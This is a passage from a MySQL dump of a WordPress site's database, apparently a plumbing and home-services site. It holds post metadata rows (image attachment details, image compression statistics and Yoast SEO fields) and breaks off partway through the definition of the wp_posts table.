470,209,'_yoast_wpseo_content_score','90'),(471,209,'_yoast_wpseo_primary_category','5'),(472,209,'wpmdr_menu','1'),(477,210,'smush-complete','1'),(478,210,'smush-info','The file was compressed from 341.01 KB to 318.60 KB saving 6.57 percent using WP-Optimize'),(479,210,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:349194;s:12:\"smushed-size\";i:326251;s:15:\"savings-percent\";d:6.5700000000000003;}'),(480,211,'smush-complete','1'),(481,211,'smush-info','The file was compressed from 299.80 KB to 279.96 KB saving 6.62 percent using WP-Optimize'),(482,211,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:306995;s:12:\"smushed-size\";i:286684;s:15:\"savings-percent\";d:6.6200000000000001;}'),(483,212,'smush-complete','1'),(484,212,'smush-info','The file was compressed from 218.87 KB to 205.29 KB saving 6.2 percent using WP-Optimize'),(485,212,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:224122;s:12:\"smushed-size\";i:210219;s:15:\"savings-percent\";d:6.2000000000000002;}'),(486,213,'smush-complete','1'),(487,213,'smush-info','The file was compressed from 303.01 KB to 288.41 KB saving 4.82 percent using WP-Optimize'),(488,213,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:310285;s:12:\"smushed-size\";i:295331;s:15:\"savings-percent\";d:4.8200000000000003;}'),(489,214,'smush-complete','1'),(490,214,'smush-info','The file was compressed from 374.18 KB to 354.25 KB saving 5.33 percent using WP-Optimize'),(491,214,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:383161;s:12:\"smushed-size\";i:362752;s:15:\"savings-percent\";d:5.3300000000000001;}'),(492,215,'smush-complete','1'),(493,215,'smush-info','The file was compressed from 272.50 KB to 253.24 KB saving 7.07 percent using WP-Optimize'),(494,215,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:279036;s:12:\"smushed-size\";i:259322;s:15:\"savings-percent\";d:7.0700000000000003;}'),(495,216,'smush-complete','1'),(496,216,'smush-info','The file was compressed from 143.50 KB to 136.25 KB saving 5.05 percent using WP-Optimize'),(497,216,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:146945;s:12:\"smushed-size\";i:139517;s:15:\"savings-percent\";d:5.0499999999999998;}'),(508,229,'_wp_attached_file','2019/10/plumbing3.jpg'),(509,229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:21:\"2019/10/plumbing3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"plumbing3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"plumbing3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing3-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:21:\"plumbing3-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"48\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(510,230,'_wp_attached_file','2019/10/plumbing2.jpg'),(511,230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2019/10/plumbing2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"plumbing2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"plumbing2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing2-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:21:\"plumbing2-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(512,231,'_wp_attached_file','2019/10/plumbing1.jpg'),(513,231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2019/10/plumbing1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"plumbing1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"plumbing1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing1-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:21:\"plumbing1-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(514,232,'_wp_attached_file','2019/10/plumbing.jpg'),(515,232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:20:\"2019/10/plumbing.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"plumbing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"plumbing-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"plumbing-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"plumbing-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:20:\"plumbing-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(516,233,'_wp_attached_file','2019/10/plumber.jpg'),(517,233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:19:\"2019/10/plumber.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"plumber-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"plumber-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"plumber-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"plumber-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:19:\"plumber-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(518,234,'_wp_attached_file','2019/10/plumbing4.jpg'),(519,234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:21:\"2019/10/plumbing4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"plumbing4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"plumbing4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"plumbing4-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:21:\"plumbing4-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"DSC-RX10\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"27.11\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(527,229,'smush-complete','1'),(528,229,'smush-info','The file was compressed from 88.40 KB to 87.46 KB saving 1.07 percent using WP-Optimize'),(529,229,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:90526;s:12:\"smushed-size\";i:89560;s:15:\"savings-percent\";d:1.0700000000000001;}'),(530,230,'smush-complete','1'),(531,230,'smush-info','The file was compressed from 96.86 KB to 94.78 KB saving 2.15 percent using WP-Optimize'),(532,230,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:99185;s:12:\"smushed-size\";i:97057;s:15:\"savings-percent\";d:2.1499999999999999;}'),(533,231,'smush-complete','1'),(534,231,'smush-info','The file was compressed from 178.98 KB to 171.17 KB saving 4.37 percent using WP-Optimize'),(535,231,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:183275;s:12:\"smushed-size\";i:175275;s:15:\"savings-percent\";d:4.3700000000000001;}'),(536,232,'smush-complete','1'),(537,232,'smush-info','The file was compressed from 192.16 KB to 182.96 KB saving 4.79 percent using WP-Optimize'),(538,232,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:196776;s:12:\"smushed-size\";i:187348;s:15:\"savings-percent\";d:4.79;}'),(539,233,'smush-complete','1'),(540,233,'smush-info','The file was compressed from 92.47 KB to 89.64 KB saving 3.06 percent using WP-Optimize'),(541,233,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:94688;s:12:\"smushed-size\";i:91789;s:15:\"savings-percent\";d:3.0600000000000001;}'),(542,234,'smush-complete','1'),(543,234,'smush-info','The file was compressed from 73.50 KB to 71.43 KB saving 2.82 percent using WP-Optimize'),(544,234,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:75265;s:12:\"smushed-size\";i:73146;s:15:\"savings-percent\";d:2.8199999999999998;}'),(553,242,'_edit_last','1'),(554,242,'_edit_lock','1599490081:1'),(555,243,'_wp_attached_file','2019/12/pexels-photo-164005.jpeg'),(556,243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2254;s:6:\"height\";i:1500;s:4:\"file\";s:32:\"2019/12/pexels-photo-164005.jpeg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"pexels-photo-164005-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"pexels-photo-164005-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"pexels-photo-164005-768x511.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"pexels-photo-164005-1024x681.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"pexels-photo-164005-300x250.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:32:\"pexels-photo-164005-350x220.jpeg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(557,242,'_thumbnail_id','243'),(558,242,'_yoast_wpseo_content_score','90'),(559,245,'_edit_last','1'),(560,245,'_yoast_wpseo_content_score','30'),(561,245,'_edit_lock','1576664561:1'),(562,242,'wpmdr_menu','1'),(563,243,'smush-complete','1'),(564,243,'smush-info','The file was compressed from 553.19 KB to 553.19 KB saving 0 percent using WP-Optimize'),(565,243,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:566469;s:12:\"smushed-size\";i:566469;s:15:\"savings-percent\";d:0;}'),(566,248,'_edit_last','1'),(567,248,'_edit_lock','1599490242:1'),(568,249,'_wp_attached_file','2019/12/pexels-photo-2098443.jpeg'),(569,249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2250;s:6:\"height\";i:1500;s:4:\"file\";s:33:\"2019/12/pexels-photo-2098443.jpeg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"pexels-photo-2098443-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"pexels-photo-2098443-300x200.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"pexels-photo-2098443-768x512.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"pexels-photo-2098443-1024x683.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"pexels-photo-2098443-300x250.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:33:\"pexels-photo-2098443-350x220.jpeg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(570,250,'_wp_attached_file','2019/12/pexels-photo.jpg'),(571,250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2250;s:6:\"height\";i:1500;s:4:\"file\";s:24:\"2019/12/pexels-photo.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"pexels-photo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"pexels-photo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"pexels-photo-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"pexels-photo-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"pexels-photo-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:24:\"pexels-photo-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(572,249,'smush-complete','1'),(573,249,'smush-info','The file was compressed from 215.68 KB to 215.68 KB saving 0 percent using WP-Optimize'),(574,249,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:220856;s:12:\"smushed-size\";i:220856;s:15:\"savings-percent\";d:0;}'),(575,248,'_thumbnail_id','249'),(576,248,'_yoast_wpseo_content_score','30'),(577,250,'smush-complete','1'),(578,250,'smush-info','The file was compressed from 218.01 KB to 218.01 KB saving 0 percent using WP-Optimize'),(579,250,'smush-stats','a:4:{s:12:\"smushed-with\";s:10:\"nitrosmush\";s:13:\"original-size\";i:223239;s:12:\"smushed-size\";i:223239;s:15:\"savings-percent\";d:0;}'),(580,248,'wpmdr_menu','1'),(581,245,'wpmdr_menu','1'),(585,259,'_edit_last','1'),(586,259,'_edit_lock','1597932379:1'),(587,259,'_yoast_wpseo_content_score','60'),(588,234,'_wp_attachment_image_alt','highly-qualified plumbers and heating engineers are specialists in their fields and often fix issues quickly, neatly and efficiently.'),(589,259,'_yoast_wpseo_focuskw_text_input','how to choose plumber'),(590,259,'_yoast_wpseo_focuskw','how to choose plumber'),(591,259,'_yoast_wpseo_metadesc','Read our essential tips in what you need to look out for when choosing a reliable tradesperson to carry out your plumbing needs.'),(592,259,'_yoast_wpseo_linkdex','60'),(593,262,'_menu_item_type','post_type'),(594,262,'_menu_item_menu_item_parent','29'),(595,262,'_menu_item_object_id','259'),(596,262,'_menu_item_object','page'),(597,262,'_menu_item_target',''),(598,262,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(599,262,'_menu_item_xfn',''),(600,262,'_menu_item_url',''),(602,259,'wpmdr_menu','1'),(620,282,'_edit_lock','1628256868:1'),(621,282,'_edit_last','1'),(622,284,'_wp_attached_file','2021/08/building-768815_1920.jpg'),(623,284,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1279;s:4:\"file\";s:32:\"2021/08/building-768815_1920.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"building-768815_1920-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"building-768815_1920-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"building-768815_1920-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"building-768815_1920-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"building-768815_1920-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"building-768815_1920-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:32:\"building-768815_1920-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(624,282,'_thumbnail_id','284'),(627,284,'_wp_attachment_image_alt','property developers'),(629,287,'_edit_last','1'),(630,287,'_edit_lock','1629811807:1'),(636,291,'_wp_attached_file','2021/08/home-improvements.jpg'),(637,291,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:659;s:4:\"file\";s:29:\"2021/08/home-improvements.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"home-improvements-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"home-improvements-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"home-improvements-768x527.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:527;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"home-improvements-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:29:\"home-improvements-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(638,287,'_thumbnail_id','291'),(642,287,'_yoast_wpseo_focuskw','waste removal services'),(643,287,'_yoast_wpseo_linkdex','58'),(644,287,'_yoast_wpseo_content_score','60'),(645,287,'_yoast_wpseo_estimated-reading-time-minutes','2'),(648,296,'_edit_last','1'),(649,296,'_wp_page_template','default'),(650,296,'_yoast_wpseo_estimated-reading-time-minutes',''),(651,296,'_edit_lock','1631789283:1');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
